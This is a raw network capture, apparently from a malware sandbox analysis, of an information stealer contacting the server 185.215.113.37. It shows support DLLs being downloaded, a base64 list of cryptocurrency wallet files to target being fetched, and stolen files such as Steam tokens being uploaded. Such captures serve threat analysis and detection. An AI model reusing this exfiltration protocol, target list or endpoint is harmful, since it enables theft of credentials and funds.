name="file"------AFCBFIJEHDHCBGDGDGCB--
Sep 26, 2024 02:40:14.463972092 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 00:40:13 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 02:40:15.151315928 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIIIJDAAAAAAKECBFBAE Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------HIIIJDAAAAAAKECBFBAEContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------HIIIJDAAAAAAKECBFBAEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HIIIJDAAAAAAKECBFBAEContent-Disposition: form-data; name="file"------HIIIJDAAAAAAKECBFBAE--
Sep 26, 2024 02:40:15.869705915 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 00:40:15 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 02:40:16.291759968 CEST	93	OUT	GET /0d60be0de163924d/freebl3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 02:40:16.693466902 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 00:40:16 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Sep 26, 2024 02:40:17.351003885 CEST	93	OUT	GET /0d60be0de163924d/mozglue.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 02:40:17.576571941 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 00:40:17 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Sep 26, 2024 02:40:17.978255033 CEST	94	OUT	GET /0d60be0de163924d/msvcp140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 02:40:18.203430891 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 00:40:18 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Sep 26, 2024 02:40:19.339780092 CEST	90	OUT	GET /0d60be0de163924d/nss3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 02:40:19.564971924 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 00:40:19 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Sep 26, 2024 02:40:21.706180096 CEST	94	OUT	GET /0d60be0de163924d/softokn3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 02:40:21.932040930 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 00:40:21 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Sep 26, 2024 02:40:22.226141930 CEST	98	OUT	GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 02:40:22.451395988 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 00:40:22 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Sep 26, 2024 02:40:23.093648911 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHIJJJEGDBFHDHJJDBAK Host: 185.215.113.37 Content-Length: 1003 Connection: Keep-Alive Cache-Control: no-cache
Sep 26, 2024 02:40:23.817655087 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 00:40:23 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=84 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 02:40:23.884638071 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKEGDHJDHDAFHJJKJEHC Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 2d 2d 0d 0a Data Ascii: ------AKEGDHJDHDAFHJJKJEHCContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------AKEGDHJDHDAFHJJKJEHCContent-Disposition: form-data; name="message"wallets------AKEGDHJDHDAFHJJKJEHC--
Sep 26, 2024 02:40:24.128273964 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 00:40:23 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Sep 26, 2024 02:40:24.130759954 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJJECGHJDBFIJJJKEHCB Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 2d 2d 0d 0a Data Ascii: ------KJJECGHJDBFIJJJKEHCBContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------KJJECGHJDBFIJJJKEHCBContent-Disposition: form-data; name="message"ybncbhylepme------KJJECGHJDBFIJJJKEHCB--
Sep 26, 2024 02:40:24.381064892 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 00:40:24 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 5801 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 2a 2e 70 6c 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 61 72 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 62 72 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 65 63 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 65 67 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 69 6e 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 70 74 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 61 63 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 62 64 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f [TRUNCATED] Data Ascii: .pl<br> 1.google.com.google.com<br>.ar<br> 1.google.com.google.com<br>.br<br> 1.google.com.google.com<br>.ec<br> 1.google.com.google.com<br>.eg<br> 1.google.com.google.com<br>.in<br> 1.google.com.google.com<br>.pt<br> 1.google.com.google.com<br>.ac<br> 1.google.com.google.com<br>.bd<br> 1.google.com.google.com<br>.zm<br> 1.google.com.google.com<br>.ve<br> 1.google.com.google.com<br>.pk<br> 1.google.com.google.com<br>.rs<br> 1.google.com.google.com<br>.ph<br> 1.google.com.google.com<br>.mx<br> 1.google.com.google.com<br>.in<br> 1.google.com.google.com<br>.th<br> 1.google.com.google.com<br>.id<br> 1.google.com.google.com<br>.tr<br> 1.google.com.google.com<br>.cz<br> 1.google.com.google.com<br>.io<br> 1.google.com.google.com<br>.dz<br> 1.google.com.google.com<br>.de<br> 1.google.com.google.com<br>.kr<br> 1.google.com.google.com<br>.ma<br> 1.google.com.google.com<br>.jp<br> 1.google.com.google.com
Sep 26, 2024 02:40:24.398205996 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJDBGDGCGDAKFIDGIDBF Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------IJDBGDGCGDAKFIDGIDBFContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------IJDBGDGCGDAKFIDGIDBFContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IJDBGDGCGDAKFIDGIDBFContent-Disposition: form-data; name="file"------IJDBGDGCGDAKFIDGIDBF--
Sep 26, 2024 02:40:25.114589930 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 00:40:24 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
